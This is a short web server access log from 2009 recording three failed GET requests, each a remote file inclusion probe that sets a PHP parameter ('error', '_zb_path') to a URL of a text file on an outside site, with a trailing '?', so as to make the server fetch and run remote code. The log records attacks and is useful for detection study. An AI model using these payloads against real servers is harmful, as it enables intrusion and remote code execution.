222.236.47.23 - - [07/Sep/2009:04:41:43 -0500] "GET /logs/access_log.1241308800/errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.236.47.23 - - [07/Sep/2009:04:41:43 -0500] "GET /errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
125.141.196.8 - - [07/Sep/2009:04:41:51 -0500] "GET /logs/access_log.1236211200///?_zb_path=http://www.archivverein-herrnhut.de/cms/zfxid.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
